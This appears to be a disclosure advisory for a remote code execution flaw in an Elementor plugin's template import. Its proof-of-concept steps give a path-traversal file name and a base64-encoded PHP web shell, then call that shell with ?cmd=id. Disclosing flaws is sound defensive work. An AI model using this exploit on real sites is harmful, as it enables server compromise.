Description The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
1. Edit a post in Elementor.
2. Import a template (folder icon on an Elementor block).
3. Pick any JSON file, and intercept the AJAX request.
4. Replace the file name with "/../../../../shell.php"
5. Replace the base64 contents (fileData) with "PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="
6. Visit /wp-content/shell.php?cmd=id to see the RCE.